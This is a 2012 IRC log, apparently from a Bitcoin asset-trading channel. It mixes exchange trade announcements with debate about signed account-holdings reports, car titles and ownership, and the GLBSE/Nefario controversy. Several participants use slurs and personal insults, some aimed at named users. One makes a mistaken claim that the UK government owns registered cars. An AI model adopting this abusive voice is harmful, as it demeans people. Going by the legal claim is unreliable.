02:50:25 The data is so people not owning the account can verify the holdings on said accounts PRESENTLY. A signed receipt wouldn't guarantee anything 1 second afterward. Sep 23 02:51:20 There's no purpose in holding the receipt, the purpose of that API feature would be for people to check an account's content live. Sep 23 02:52:06 yes. and this is a bad ideea because there's a slew of legitimate reasons the holder might not want to make this available. Sep 23 02:52:34 Yes... which is why it would be an option, not forced... Sep 23 02:52:47 but anyway, enough of this. im not getting paid enough to save anyone work on the matter. Sep 23 02:52:54 So funds manager may make their account holdings public if they wish so Sep 23 02:56:41 [MPEX] [O.BTCUSD.P200T] 1000 @ 0.78029213 = 780.2921 BTC [+] Sep 23 03:00:05 http://www.chicagotribune.com/news/local/ct-met-school-dances-20120922,0,3541288.story Sep 23 03:00:30 [GLBSE] [BITBOND] 1 @ 0.3688 BTC [+] Sep 23 03:04:24 https://images.4chan.org/pol/src/1348354357380.png Sep 23 03:07:04 [GLBSE] [COGNITIVE] 6 @ 0.5897 = 3.5382 BTC [-] Sep 23 03:10:22 [GLBSE] [RAREEARTH] 10 @ 0.00980001 = 0.098 BTC [-] Sep 23 03:11:54 "it's to prove ownership" BTC-Mining am i missing something here, or were you wanting to prove ownership of assets in a glbse account? Sep 23 03:13:31 yes, but why sign it with GLBSE key instead of just showing it? Sep 23 03:13:52 mircea_popescu: also, if i understand deeds correctly, their main purpose is to prevent the individual from owning the thing independantly. in the case of cars, you don't own your car, you and the state own that car Sep 23 03:14:03 deeds/titles Sep 23 03:14:29 BTC-Mining: so that you can have a record of that data which can be trusted Sep 23 03:14:30 [GLBSE] [SILVER] 10 @ 0.00998 = 0.0998 BTC [-] Sep 23 03:15:26 BTC-Mining: and it's trivial to do both at the same time Sep 23 03:15:41 But the thing is, you don't need that record if GLBSE can just show it. Sep 23 03:15:47 added benifit, no (real) extra cost Sep 23 03:16:13 BTC-Mining: you do for independant reports/publications using that information Sep 23 03:16:14 Especially since it doesn't make any guarantee the account is still in the same standings Sep 23 03:16:43 the purpose of most all financial reports is to present the status at a given time anyway Sep 23 03:16:50 Why would people take the time to verify the signature if they can just click a link to see it directly on GLBSE? Sep 23 03:18:09 there could be many pointls of data (related or unrelated) which would require many lnk clicks, but only one sig verification command Sep 23 03:18:48 If the link displays all the accounts hold, that wouldn't rquire more than 1 click... Sep 23 03:19:46 Did Gavin ever give that September announcement? Sep 23 03:20:20 this is what i meant to imply by related or unrelated. the data presented could contain more than just the assets in the account link information Sep 23 03:21:14 Obsi: The announcement was Stallman's plush GNU will now be auctioned off for Bitcoins. Sep 23 03:21:47 Eh Sep 23 03:22:33 But then we'd probably need account auditors to give only specific information and sign it from GLBSE Sep 23 03:23:08 [MPEX] [F.GIGA.ETF] 4050 @ 0.0002814 = 1.1397 BTC [-] Sep 23 03:23:10 [MPEX] [F.GIGA.ETF] 9550 @ 0.00028105 = 2.684 BTC [-] Sep 23 03:23:23 The whole point was for funds to make the holdings public if they wished so, so GLBSE doesn't have to manually confirm that. Sep 23 03:23:24 BTC-Mining: also, can't a sig be verified offline? Sep 23 03:24:06 Yes. For that it could be helpful except GLBSE users are anonymous and I can't send them documents offline. Sep 23 03:24:18 well, didn't i suggest that the information be signed because it add benifit at almost no cost? Sep 23 03:24:37 I suppose. Sep 23 03:25:22 I don't see why you need a specific and complicated example to see the benifit in an exchange automatically signing a doc like you want. Sep 23 03:25:24 [GLBSE] [OBSI.HRPT] 1 @ 0.07002 BTC [-] Sep 23 03:25:26 [GLBSE] [OBSI.HRPT] 33 @ 0.07000001 = 2.31 BTC [-] Sep 23 03:25:27 [GLBSE] [OBSI.HRPT] 2 @ 0.07000001 = 0.14 BTC [-] Sep 23 03:25:28 [GLBSE] [OBSI.HRPT] 185 @ 0.07 = 12.95 BTC [-] Sep 23 03:25:34 not that it needs it, but that it benifits form it Sep 23 03:25:37 *from Sep 23 03:25:56 benefits Sep 23 03:25:57 It's not very useful except for offline people however. And adds extra steps to verify signatures. Sep 23 03:25:59 spelling Sep 23 03:26:28 i think it's useful for online people too Sep 23 03:26:38 How so? Sep 23 03:27:47 if i wanted to presentthe traditional financial reports of a company and have the data verified by glbse Sep 23 03:28:21 the api calls would show the current data, which would be out of date with the reports Sep 23 03:28:26 Well... if they're online, we go back to clicking a link put in references to be easier... Sep 23 03:28:54 but the links would show current data, not past data, right? Sep 23 03:29:03 Ah, so it appears exactly as on the report... Sep 23 03:29:06 Yes... Sep 23 03:29:25 like i said earlier, x proves y at time z Sep 23 03:29:44 trusted, because glbse signed the data Sep 23 03:29:56 i'm sure there are many more situations too Sep 23 03:31:56 Would get complicated to design systems for all these cases however. Sep 23 03:35:13 signing the data? Sep 23 03:36:24 No, making all the different automated processes. Sep 23 03:36:56 For the last time the whole point is not relying on auditors working all the time to verify people's account constantly. Sep 23 03:39:22 smickles the purpose of deeds isn't to prevent anyone from owning "independently" Sep 23 03:41:21 <[\\\]> just a formal way to identify the passing of ownership Sep 23 03:41:25 <[\\\]> no indian giving Sep 23 03:42:02 [GLBSE] [GOLD] 5 @ 0.00995 = 0.0498 BTC [-] Sep 23 03:42:28 the title is just a conveniend way to cleave ownership and posession Sep 23 03:42:34 w/o titles whoever drives the car owns it Sep 23 03:42:44 with titles you can now lease your car, lend it, have vallet parking etc. Sep 23 03:48:56 [MPEX] [S.MPOE] 24050 @ 0.00042 = 10.101 BTC [+] Sep 23 03:49:56 i thought you were saying titties Sep 23 03:50:12 but it appears you are using the word titles Sep 23 03:50:17 meh Sep 23 03:51:03 jcpham got all excited for a second. Sep 23 03:51:13 He knows about mircea's other businesses... Sep 23 03:52:55 No but if something happens... you can prove it's your car! Sep 23 03:53:15 i can use a gun to prove it's my car too Sep 23 03:53:20 just as convincing Sep 23 03:53:23 Assuming you lose your ticket and the valet manages to forget which car you came with. Sep 23 03:53:26 do you folk get to own your cars. we dont in UK we have to sign it over to the gov and we become a registered keeper. Sep 23 03:54:56 eh ? Sep 23 03:55:34 you dont have to pay taxes and the rest of the shit then Sep 23 03:55:41 on your car that is Sep 23 03:56:00 no registration /licence plates Sep 23 03:56:26 registered keeper is when yiou keep someone else's car Sep 23 03:57:05 in uk the person who buys the car is the registered keeper the governemtn owns the car Sep 23 03:57:11 k3t3r: It's so government's agents can requisition the car? =P Sep 23 03:57:19 yes Sep 23 03:57:30 exaclty that Sep 23 03:57:48 you sign you care over to gov, then theey can make demands with menaces Sep 23 03:57:51 k3t3r that's bs. Sep 23 03:58:00 pay tax or we take you car Sep 23 03:58:08 buy insurance or we take the car Sep 23 03:58:22 this would have nothing to do with "signing it oveR" Sep 23 03:58:56 [GLBSE] [PPT.DIV] 1 @ 0.00011001 BTC [+] Sep 23 03:58:57 [GLBSE] [PPT.DIV] 1 @ 0.00011 BTC [-] Sep 23 03:58:57 it is to do with signing it over in uk. Sep 23 03:59:09 the reason you MUST buy insurance, whether you want to or not, is that if you're the sort of idiot that thnks you're "signing your car over to thegovernment" you probably will hit my expensive mercedes with your rustbucket fiat Sep 23 03:59:18 and i'm not paying for your illiteracy. Sep 23 03:59:24 they cannot take your property unless you have commited a criminal offence Sep 23 03:59:26 [GLBSE] [BIF.BTCST.PPT] 1 @ 0.01000001 BTC [+] Sep 23 03:59:27 [GLBSE] [BIF.BTCST.PPT] 3 @ 0.01 = 0.03 BTC [-] Sep 23 03:59:36 no, they can take your car just for being stupid. Sep 23 03:59:38 you havent a clue Sep 23 03:59:55 what country are you in Sep 23 04:00:07 this makes a difference ? Sep 23 04:00:12 [GLBSE] [JAH] 1 @ 0.1301 BTC [-] Sep 23 04:00:26 in the uk you cannot drive a car unless you become the registered keeper Sep 23 04:00:33 that means the DVLA own you car Sep 23 04:00:33 ... Sep 23 04:00:39 who told you this ? Sep 23 04:00:52 and they can take it if you dont play by their rules Sep 23 04:00:56 [GLBSE] [TCC] 2 @ 0.00000001 BTC [-] Sep 23 04:00:58 who.told.you.this. Sep 23 04:01:13 you know the differnce between legal and lawful Sep 23 04:01:25 haha Sep 23 04:01:28 sigh. Sep 23 04:02:05 i am serious though you cann read the road traffic act Sep 23 04:02:15 yes, i can. i doubt you can, but anyway. cite. Sep 23 04:02:37 you dont have to believe ne i dont care either wya Sep 23 04:02:49 just saying Sep 23 04:03:13 dude. Sep 23 04:03:19 you made a remarkably idiotic statement Sep 23 04:03:24 when challenged you refer to the law Sep 23 04:03:27 notice you attack the person not the argument Sep 23 04:03:29 when asked to cite you claim you don't care Sep 23 04:03:32 you're textbook stupid. Sep 23 04:03:45 that is intelletually immature Sep 23 04:03:56 great. Sep 23 04:04:00 k3t3r!*@* added to ignore list. Sep 23 04:04:34 I should stop commenting on things. Seems it provokes arguments somehow... better stay silent. Sep 23 04:04:59 [GLBSE] [ASICMINER] 128 @ 0.123989 = 15.8706 BTC [+] Sep 23 04:05:00 [GLBSE] [ASICMINER] 372 @ 0.12399 = 46.1243 BTC [+] Sep 23 04:05:54 there's nothing wrong with arguments, my ignore list has to be fed somehow. Sep 23 04:06:14 "difference between legal and lawful", there's just no limit to the retardedness the internet brings forth Sep 23 04:07:29 i don't cosider myself to be the owner of "my car" because I have to get state permission to sell it Sep 23 04:08:07 eh ?! Sep 23 04:08:36 smickles what exactly do you mean ? Sep 23 04:08:56 [GLBSE] [OBSI.HRPT] 3 @ 0.08899992 = 0.267 BTC [+] Sep 23 04:09:35 mircea_popescu: with personal property of an individually taxable value, I have to meet state requirements to sell it Sep 23 04:09:54 what requirements specifically ? Sep 23 04:09:56 i ran into this issue specifically with a mobile home once Sep 23 04:11:03 do tell ? Sep 23 04:11:05 mircea_popescu: well, with cars, it's easy, isn't it? you just need to transfer the title Sep 23 04:11:27 how is transferring title getting state permission ? Sep 23 04:11:50 but in some states, you can't transfer title w/o fair value being exchanged Sep 23 04:12:51 in my specific trouble, I boght a mobile home, the later sold it to someone else. The state rejected the title transfer Sep 23 04:12:53 well i guess those states suck Sep 23 04:13:17 and then the guy who bought it from me racked up land rental debt Sep 23 04:13:33 and the state decided it was my mobile home Sep 23 04:13:41 and wanted me to pay it Sep 23 04:14:08 [MPEX] [S.MPOE] 19866 @ 0.00042 = 8.3437 BTC [+] Sep 23 04:14:14 so how did that end ? Sep 23 04:15:10 I began the process of sueing the state and the decided to pursue the other guy instead. Technically, i think they still consider it my mobilehome Sep 23 04:15:46 yeah. none of these really have much to do with ownership tho, it's a matter of bureaucracy/registration Sep 23 04:16:33 well, literal ownership, and ownership in the eyes of the 'merican gov't system are two different things Sep 23 04:16:39 "A peppercorn does not cease to be good consideration if it is established that the promisee does not like pepper and will throw away the corn. Sep 23 04:17:18 http://www.youtube.com/watch?v=bnyVE1go2vs Sep 23 04:20:14 [GLBSE] [ASICMINER] 30 @ 0.12399 = 3.7197 BTC [+] Sep 23 04:20:36 [GLBSE] [OBSI.HRPT] 27 @ 0.07000001 = 1.89 BTC [-] Sep 23 04:20:38 [GLBSE] [OBSI.HRPT] 4 @ 0.07 = 0.28 BTC [-] Sep 23 04:21:48 [GLBSE] [ASICMINER] 5 @ 0.12399 = 0.62 BTC [+] **** BEGIN LOGGING AT Sun Sep 23 09:57:09 2012 Sep 23 10:02:12 [GLBSE] [ASICMINER] 30 @ 0.1235 = 3.705 BTC [-] Sep 23 10:11:31 [GLBSE] [OBSI.HRPT] 152 @ 0.08349959 = 12.6919 BTC [+] Sep 23 10:11:32 [GLBSE] [OBSI.HRPT] 66 @ 0.0834996 = 5.511 BTC [+] Sep 23 10:11:33 [GLBSE] [OBSI.HRPT] 21 @ 0.08349999 = 1.7535 BTC [+] Sep 23 10:11:34 [GLBSE] [OBSI.HRPT] 50 @ 0.0835 = 4.175 BTC [+] Sep 23 10:11:36 [GLBSE] [OBSI.HRPT] 16 @ 0.08396999 = 1.3435 BTC [+] Sep 23 10:11:37 [GLBSE] [OBSI.HRPT] 33 @ 0.08397 = 2.771 BTC [+] Sep 23 10:11:38 [GLBSE] [OBSI.HRPT] 24 @ 0.08399999 = 2.016 BTC [+] Sep 23 10:11:39 [GLBSE] [OBSI.HRPT] 50 @ 0.084 = 4.2 BTC [+] Sep 23 10:11:40 [GLBSE] [OBSI.HRPT] 88 @ 0.08948199 = 7.8744 BTC [+] Sep 23 10:16:39 reputation is important. Sep 23 10:17:53 [GLBSE] [GIGAMINING] 1 @ 0.67357 BTC [+] Sep 23 10:18:56 [MPEX] [B.MPCD.B] 12500 @ 0.00100916 = 12.6145 BTC [-] Sep 23 10:18:58 [MPEX] [B.MPCD.B] 37500 @ 0.0010248 = 38.43 BTC [+] Sep 23 10:26:36 [GLBSE] [GOLD] 112 @ 0.00995 = 1.1144 BTC [-] Sep 23 10:32:06 [GLBSE] [OBSI.HRPT] 1 @ 0.0894 BTC [-] Sep 23 10:36:42 [GLBSE] [BTC-BOND] 1 @ 0.01 BTC [+] Sep 23 10:38:56 [GLBSE] [BBBB] 2 @ 0.00019 = 0.0004 BTC [+] Sep 23 10:39:42 [GLBSE] [FUTUREFUND] 1 @ 0.00012935 BTC [-] Sep 23 10:41:15 [GLBSE] [GSDPT] 1 @ 0.00365 BTC [+] Sep 23 10:44:04 [MPEX] [F.GIGA.ETF] 8219 @ 0.00028013 = 2.3024 BTC [-] Sep 23 10:44:05 [MPEX] [F.GIGA.ETF] 4900 @ 0.00027991 = 1.3716 BTC [-] Sep 23 10:44:07 [MPEX] [F.GIGA.ETF] 4581 @ 0.00027928 = 1.2794 BTC [-] Sep 23 10:49:38 [GLBSE] [DI.BFLSC.SUCCEED] 2 @ 0.0009 = 0.0018 BTC [-] Sep 23 11:00:54 quite the dip this weekend Sep 23 11:01:32 oh? Sep 23 11:01:39 ;;ticker Sep 23 11:01:40 lets call it the nefario effect Sep 23 11:01:40 Best bid: 11.9, Best ask: 11.91, Bid-ask spread: 0.01000, Last trade: 11.9, 24 hour volume: 19995, 24 hour low: 11.9, 24 hour high: 12.3 Sep 23 11:01:50 back in the $11's Sep 23 11:01:56 everytime he sticks his head out of the hole of the ground and sees his shadow, 6 more weeks of the market shitting itself Sep 23 11:02:15 So you get DMC back tomorrow? Sep 23 11:02:27 todays the 23rd? Sep 23 11:02:34 holy shit it is Sep 23 11:02:52 wait, you're getting dmc back ?! Sep 23 11:03:13 mircea_popescu: most likely Sep 23 11:03:17 0.0 Sep 23 11:03:24 so all the drama strictly served to legitimize glbse ? Sep 23 11:03:38 apparently so Sep 23 11:03:48 and if Im going to be a drama actor, I demand to be paid like one Sep 23 11:04:03 wait, I wonder if that means Im unionized now Sep 23 11:04:08 https://www.youtube.com/watch?v=Cdk1gwWH-Cg Sep 23 11:08:31 heh Sep 23 11:12:03 [MPEX] [F.GIGA.ETF] 8833 @ 0.00027928 = 2.4669 BTC [-] Sep 23 11:17:27 Who do I bribe to get an asset approved? Sep 23 11:18:33 [MPEX] [O.BTCUSD.P200T] 120 @ 0.79837316 = 95.8048 BTC [+] Sep 23 11:18:52 Meh, I only bought METAL & METAL.SILVER to launch METAL.COPPER, but I ain't verifying diddly Sep 23 11:19:10 Fuck verification Sep 23 11:19:21 If they start making that mandatory I'm going 100% MPEX Sep 23 11:19:34 o rly? Sep 23 11:20:05 [MPEX] [O.BTCUSD.C080T] 1 @ 0.35744441 BTC [-] Sep 23 11:20:06 [MPEX] [O.BTCUSD.C110T] 1 @ 0.12883186 BTC [-] Sep 23 11:20:08 [MPEX] [O.BTCUSD.C110T] 4 @ 0.12416448 = 0.4967 BTC [-] Sep 23 11:20:09 [GLBSE] [BFLS] 1 @ 0.64 BTC [-] Sep 23 11:20:10 [MPEX] [O.BTCUSD.C110T] 1 @ 0.11279754 BTC [-] Sep 23 11:20:11 [MPEX] [O.BTCUSD.C110T] 15 @ 0.11 = 1.65 BTC [-] Sep 23 11:20:12 [GLBSE] [BFLS] 5 @ 0.63985 = 3.1993 BTC [-] Sep 23 11:20:13 [MPEX] [O.BTCUSD.C090T] 3 @ 0.27042807 = 0.8113 BTC [-] Sep 23 11:20:14 [GLBSE] [BFLS] 1 @ 0.62 BTC [-] Sep 23 11:20:14 [GLBSE] [BFLS] 4 @ 0.61 = 2.44 BTC [-] Sep 23 11:20:16 [GLBSE] [BFLS] 1 @ 0.6 BTC [-] Sep 23 11:20:17 [GLBSE] [BFLS] 10 @ 0.56 = 5.6 BTC [-] Sep 23 11:21:04 [MPEX] [O.BTCUSD.C090T] 900 @ 0.25387137 = 228.4842 BTC [-] Sep 23 11:21:17 So for a simple pink sheets asset, is anything needed beyond what was needed 2 months ago to get approved? Sep 23 11:21:38 [MPEX] [O.BTCUSD.C080T] 1000 @ 0.33710789 = 337.1079 BTC [-] Sep 23 11:21:39 [MPEX] [O.BTCUSD.C110T] 900 @ 0.08827084 = 79.4438 BTC [-] Sep 23 11:21:40 [MPEX] [O.BTCUSD.C100T] 3 @ 0.18424607 = 0.5527 BTC [-] Sep 23 11:21:41 [MPEX] [O.BTCUSD.C100T] 897 @ 0.17063486 = 153.0595 BTC [-] Sep 23 11:24:04 [MPEX] [O.BTCUSD.C170T] 15 @ 0.02366935 = 0.355 BTC [-] Sep 23 11:24:08 [MPEX] [O.BTCUSD.C170T] 825 @ 0.00029846 = 0.2462 BTC [-] Sep 23 11:25:04 [MPEX] [O.BTCUSD.C150T] 14 @ 0.03170402 = 0.4439 BTC [-] Sep 23 11:25:05 [MPEX] [O.BTCUSD.C150T] 486 @ 0.00282513 = 1.373 BTC [-] Sep 23 11:25:49 it fell through, apparently Sep 23 11:26:32 he couldnt get enough people to do it Sep 23 11:27:37 Diablo-D3 who what ? Sep 23 11:29:00 [GLBSE] [OBSI.HRPT] 1 @ 0.071 BTC [-] Sep 23 11:29:02 [GLBSE] [OBSI.HRPT] 24 @ 0.07 = 1.68 BTC [-] Sep 23 11:29:03 [GLBSE] [OBSI.HRPT] 1 @ 0.06799998 BTC [-] Sep 23 11:29:04 [GLBSE] [OBSI.HRPT] 14 @ 0.066 = 0.924 BTC [-] Sep 23 11:31:52 usagi: If you're a real business it's awkward enough taking Bitcoin Sep 23 11:32:16 EskimoBob: the problem is you need people with accounting experience Sep 23 11:32:27 and the one person in the entire community that has that... isnt one of the people doing it Sep 23 11:33:09 nope. Sep 23 11:41:31 "In general, the market acts like a fag and it's shit's retarded." Sep 23 11:44:45 usagi has plenty of credibility Sep 23 11:44:56 That comes when you run 3 successful businesses Sep 23 11:49:57 Smoovious: no shit Sep 23 11:50:12 Smoovious: I need to start Diablo Popcorn Shipping Services Sep 23 11:50:37 nothing can be funnier then a drunk goat though Sep 23 11:50:45 that's youtube quality drama Sep 23 11:51:00 https://bitcointalk.org/index.php?topic=68329.msg1194767#msg1194767 Sep 23 11:51:05 [MPEX] [F.GIGA.ETF] 3886 @ 0.00027928 = 1.0853 BTC [-] Sep 23 11:51:06 [MPEX] [F.GIGA.ETF] 10714 @ 0.00027839 = 2.9827 BTC [-] Sep 23 11:51:11 i'm really dissapointed in mpoe-pr's performance ;/ Sep 23 11:51:43 bitcorn works better Sep 23 11:57:05 can I be a deamon? :< Sep 23 12:01:13 lol Sep 23 12:01:20 me votes YES ;) Sep 23 12:03:49 I would bail if EB took over Sep 23 12:04:17 EB ? Sep 23 12:05:25 Eskimo bob Sep 23 12:05:30 Never let goat issue any new assets on glbse, he is a prick Sep 23 12:05:46 o him. Sep 23 12:05:53 yep him Sep 23 12:06:17 has the guy ever done anything outside of irc/forum whining ? Sep 23 12:06:36 https://bitcointalk.org/index.php?topic=112071.0 Sep 23 12:06:43 he is just a &(*&*(&*( Sep 23 12:07:02 come every one knew that the glbse stock was a scam Sep 23 12:07:11 he bought it for less than 0. Sep 23 12:07:15 0.1 Sep 23 12:07:20 who? GOAT Sep 23 12:07:38 goat was drunk it was hilarious xD Sep 23 12:07:47 and now hes is crying that nef will only buy it for 0.1 Sep 23 12:07:52 his arguments and reasoning just become worse and worse until he was qouting himself to prove a point xD Sep 23 12:08:10 he didnt pay more (goat) he even sold some in march for 10 btc (who? GOAT!!!) Sep 23 12:08:55 goat really is a prick just like they said on the bitcoinshitlist Sep 23 12:18:04 [MPEX] [F.GIGA.ETF] 686 @ 0.00027839 = 0.191 BTC [-] Sep 23 12:18:05 [MPEX] [F.GIGA.ETF] 414 @ 0.00027818 = 0.1152 BTC [-] Sep 23 12:25:50 [GLBSE] [GIGAMINING] 2 @ 0.67649 = 1.353 BTC [+] Sep 23 12:28:35 [GLBSE] [HYDRO.BONDS] 2 @ 1.4468 = 2.8936 BTC [-] Sep 23 12:29:18 [GLBSE] [SILVER] 3 @ 0.00999 = 0.03 BTC [+] Sep 23 12:29:41 [GLBSE] [SILVER] 2 @ 0.00999 = 0.02 BTC [+] Sep 23 12:31:09 [GLBSE] [BFLS] 20 @ 0.51025 = 10.205 BTC [-] Sep 23 12:32:18 [GLBSE] [BFLS.RIG] 2 @ 0.77 = 1.54 BTC [-] Sep 23 12:32:20 [GLBSE] [BFLS.RIG] 2 @ 0.76 = 1.52 BTC [-] Sep 23 12:32:21 [GLBSE] [BFLS.RIG] 2 @ 0.75 = 1.5 BTC [-] Sep 23 12:33:04 [GLBSE] [BFLS] 40 @ 0.51025 = 20.41 BTC [-] Sep 23 12:33:43 [GLBSE] [BFLS] 11 @ 0.51025 = 5.6128 BTC [-] Sep 23 12:39:03 [GLBSE] [BFLS] 1 @ 0.62 BTC [+] Sep 23 12:39:27 [GLBSE] [BFLS] 1 @ 0.6 BTC [-] Sep 23 12:40:47 Looking to buy a BFL single! Sep 23 12:44:04 [MPEX] [F.GIGA.ETF] 8486 @ 0.00027818 = 2.3606 BTC [-] Sep 23 12:44:06 [MPEX] [F.GIGA.ETF] 4000 @ 0.00027749 = 1.11 BTC [-] Sep 23 12:44:07 [MPEX] [F.GIGA.ETF] 5614 @ 0.00027722 = 1.5563 BTC [-] Sep 23 12:59:11 [GLBSE] [ASICMINER] 11 @ 0.1235 = 1.3585 BTC [-] Sep 23 13:00:56 [GLBSE] [FPGAMINING] 1 @ 0.47989999 BTC [+] Sep 23 13:11:06 [MPEX] [S.MPOE] 19414 @ 0.00041962 = 8.1465 BTC [-] Sep 23 13:11:07 [MPEX] [S.MPOE] 32571 @ 0.00041907 = 13.6495 BTC [-] Sep 23 13:20:08 who did what now? Sep 23 13:26:14 [GLBSE] [FPGAMINING] 2 @ 0.47989999 = 0.9598 BTC [+] Sep 23 13:26:16 [GLBSE] [FPGAMINING] 4 @ 0.47999999 = 1.92 BTC [+] Sep 23 13:26:16 [GLBSE] [FPGAMINING] 10 @ 0.48 = 4.8 BTC [+] Sep 23 13:26:17 [GLBSE] [FPGAMINING] 5 @ 0.48299799 = 2.415 BTC [+] Sep 23 13:26:19 [GLBSE] [FPGAMINING] 10 @ 0.48299899 = 4.83 BTC [+] Sep 23 13:26:24 [MPEX] [O.BTCUSD.P120T] 1000 @ 0.04526981 = 45.2698 BTC [-] Sep 23 13:28:24 [GLBSE] [FPGAMINING] 15 @ 0.483 = 7.245 BTC [+] Sep 23 13:39:38 [GLBSE] [ASICMINER] 5 @ 0.1235 = 0.6175 BTC [-] Sep 23 13:47:27 [GLBSE] [SILVER] 29 @ 0.00999 = 0.2897 BTC [+] Sep 23 13:47:29 [GLBSE] [SILVER] 33 @ 0.00999998 = 0.33 BTC [+] Sep 23 13:47:30 [GLBSE] [SILVER] 13 @ 0.00999999 = 0.13 BTC [+] Sep 23 13:51:33 [GLBSE] [OBSI.HRPT] 2 @ 0.08 = 0.16 BTC [+] Sep 23 13:52:28 "your mom" Sep 23 13:53:42 [GLBSE] [FPGAMINING] 1 @ 0.483 BTC [+] Sep 23 13:56:09 [GLBSE] [GOLD] 33 @ 0.00999999 = 0.33 BTC [+] Sep 23 13:56:45 [GLBSE] [YABMC] 1 @ 0.08995 BTC [-] Sep 23 13:57:48 yup Sep 23 13:59:05 [MPEX] [S.MPOE] 26829 @ 0.00041907 = 11.2432 BTC [-] Sep 23 13:59:07 [MPEX] [S.MPOE] 24871 @ 0.0004187 = 10.4135 BTC [-] Sep 23 14:01:42 [GLBSE] [ASICMINER] 7 @ 0.1217 = 0.8519 BTC [-] Sep 23 14:01:44 [GLBSE] [ASICMINER] 15 @ 0.1216 = 1.824 BTC [-] Sep 23 14:01:44 [GLBSE] [ASICMINER] 15 @ 0.1212 = 1.818 BTC [-] Sep 23 14:01:45 [GLBSE] [ASICMINER] 1 @ 0.1211 BTC [-] Sep 23 14:01:46 [GLBSE] [ASICMINER] 1 @ 0.121 BTC [-] Sep 23 14:01:47 [GLBSE] [ASICMINER] 1 @ 0.1201 BTC [-] Sep 23 14:05:37 [GLBSE] [PUREMINING] 1 @ 0.1087 BTC [+] Sep 23 14:12:29 [GLBSE] [ASICMINER] 73 @ 0.1235 = 9.0155 BTC [+] Sep 23 14:21:13 [GLBSE] [PUREMINING] 1 @ 0.09390001 BTC [-] Sep 23 14:21:13 [GLBSE] [PUREMINING] 1 @ 0.0939 BTC [-] Sep 23 14:21:15 [GLBSE] [PUREMINING] 1 @ 0.09378 BTC [-] Sep 23 14:21:16 [GLBSE] [PUREMINING] 9 @ 0.09366 = 0.8429 BTC [-] Sep 23 14:21:17 [GLBSE] [PUREMINING] 42 @ 0.093455 = 3.9251 BTC [-] Sep 23 14:21:18 [GLBSE] [PUREMINING] 40 @ 0.093355 = 3.7342 BTC [-] Sep 23 14:21:20 [GLBSE] [PUREMINING] 6 @ 0.09205 = 0.5523 BTC [-] Sep 23 14:25:06 [MPEX] [S.MPOE] 43950 @ 0.00042 = 18.459 BTC [+] Sep 23 14:28:44 [GLBSE] [SS] 1 @ 0.01500003 BTC [+] Sep 23 14:28:46 [GLBSE] [SS] 1 @ 0.01500002 BTC [-] Sep 23 14:31:34 [GLBSE] [JAH] 1 @ 0.1301 BTC [-] Sep 23 14:31:36 [GLBSE] [JAH] 1 @ 0.128 BTC [-] Sep 23 14:32:41 [GLBSE] [OBSI.HRPT] 2 @ 0.07999998 = 0.16 BTC [-] Sep 23 14:36:33 [GLBSE] [CPA] 1 @ 0.05100001 BTC [-] Sep 23 14:36:35 [GLBSE] [CPA] 39 @ 0.05 = 1.95 BTC [-] Sep 23 14:49:41 Want to buy BFLS Single! Shipping to Sweden. pm me if you are interested :) Sep 23 14:49:56 [GLBSE] [ASICMINER] 30 @ 0.1234 = 3.702 BTC [-] Sep 23 14:50:48 [GLBSE] [ASICMINER] 4 @ 0.1235 = 0.494 BTC [+] Sep 23 14:51:06 [MPEX] [S.MPOE] 429 @ 0.0004187 = 0.1796 BTC [-] Sep 23 14:51:07 [MPEX] [S.MPOE] 2016 @ 0.00041662 = 0.8399 BTC [-] Sep 23 14:52:06 [GLBSE] [NYAN.B] 3 @ 0.98000001 = 2.94 BTC [-] Sep 23 14:52:08 [GLBSE] [NYAN.B] 1 @ 0.98 BTC [-] Sep 23 14:52:09 [GLBSE] [NYAN.B] 10 @ 0.98 = 9.8 BTC [-] Sep 23 14:52:51 [GLBSE] [GIGAMINING] 2 @ 0.67357977 = 1.3472 BTC [-] Sep 23 15:13:30 [GLBSE] [OBSI.HRPT] 1 @ 0.07999997 BTC [-] Sep 23 15:19:09 [GLBSE] [GIGAMINING] 1 @ 0.6728797 BTC [-] Sep 23 15:20:06 [MPEX] [F.GIGA.ETF] 6300 @ 0.00027722 = 1.7465 BTC [-] Sep 23 15:20:26 [GLBSE] [GIGAMINING] 1 @ 0.6728797 BTC [-] Sep 23 15:28:15 another 100000 shares are up for sale for GSDPT Sep 23 15:41:25 mornin Sep 23 15:41:56 [GLBSE] [CPA] 1 @ 0.06998999 BTC [+] Sep 23 15:41:58 [GLBSE] [CPA] 9 @ 0.06999 = 0.6299 BTC [+] Sep 23 15:42:43 [GLBSE] [CPA] 1 @ 0.05 BTC [-] Sep 23 15:46:07 [MPEX] [F.GIGA.ETF] 186 @ 0.00027722 = 0.0516 BTC [-] Sep 23 15:46:08 [MPEX] [F.GIGA.ETF] 14114 @ 0.00027718 = 3.9121 BTC [-] Sep 23 15:46:37 This whole goat/Nefario business is getting redicilous Sep 23 15:46:57 Goat is trying to dig up old promises, that no longer apply or are valid to make a quick buck. It's disgusting... Sep 23 15:47:14 [GLBSE] [BTCMC] 1 @ 0.581 BTC [+] Sep 23 15:47:16 [GLBSE] [ASICMINER] 3 @ 0.12 = 0.36 BTC [-] Sep 23 15:47:17 [GLBSE] [ASICMINER] 5 @ 0.118 = 0.59 BTC [-] Sep 23 15:47:19 [GLBSE] [ASICMINER] 10 @ 0.11241 = 1.1241 BTC [-] Sep 23 15:47:20 [GLBSE] [ASICMINER] 30 @ 0.11240011 = 3.372 BTC [-] Sep 23 15:47:21 [GLBSE] [ASICMINER] 35 @ 0.1124001 = 3.934 BTC [-] Sep 23 15:47:22 [GLBSE] [ASICMINER] 25 @ 0.1123001 = 2.8075 BTC [-] Sep 23 15:47:24 [GLBSE] [ASICMINER] 3 @ 0.1123001 = 0.3369 BTC [-] Sep 23 15:47:24 [GLBSE] [ASICMINER] 5 @ 0.1123 = 0.5615 BTC [-] Sep 23 15:47:25 [GLBSE] [ASICMINER] 20 @ 0.11220001 = 2.244 BTC [-] Sep 23 15:47:26 [GLBSE] [ASICMINER] 100 @ 0.1122 = 11.22 BTC [-] Sep 23 15:47:27 [GLBSE] [ASICMINER] 3 @ 0.11211 = 0.3363 BTC [-] Sep 23 15:47:28 [GLBSE] [ASICMINER] 20 @ 0.10810012 = 2.162 BTC [-] Sep 23 15:47:29 [GLBSE] [ASICMINER] 2 @ 0.107 = 0.214 BTC [-] Sep 23 15:47:31 [GLBSE] [ASICMINER] 3 @ 0.106 = 0.318 BTC [-] Sep 23 15:47:32 [GLBSE] [ASICMINER] 170 @ 0.1055 = 17.935 BTC [-] Sep 23 15:47:33 [GLBSE] [ASICMINER] 10 @ 0.1054 = 1.054 BTC [-] Sep 23 15:47:33 [GLBSE] [ASICMINER] 30 @ 